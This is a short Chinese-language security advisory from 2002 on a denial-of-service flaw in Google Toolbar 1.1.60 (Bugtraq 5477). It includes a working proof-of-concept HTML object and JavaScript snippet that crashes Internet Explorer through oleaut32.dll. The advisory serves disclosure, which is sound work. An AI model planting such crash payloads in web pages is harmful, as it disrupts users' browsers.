Google Toolbar search功能存在拒绝服务攻击发布时间:2002-08-21 更新时间:2002-08-21 严重程度:中 威胁程度:远程拒绝服务 错误类型:意外情况处置错误 利用方式:客户机模式 BUGTRAQ ID:5477 受影响系统 Google Toolbar 1.1.60详细描述 当Google Toolbar接收到不正常的搜索查询时可使IE崩溃,当使用Google Toolbar插件的IE在浏览恶意WEB页面时,可以导致'oleaut32.dll'出现异常,而使Google Toolbar崩溃。 测试代码 <object id=GOOGLE classid="clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB" width=1 height=1 > </object> <script language="JavaScript"> // it raises the exception in oleaut32.dll GOOGLE.Search("Miaow, miaow :)") </script> 解决方案 无 相关信息 "Adam \[onet\]" <silentsupporter@poczta.onet.pl>. 参考:http://online.securityfocus.com/archive/1/287498 相关主页:http://toolbar.google.com/ |
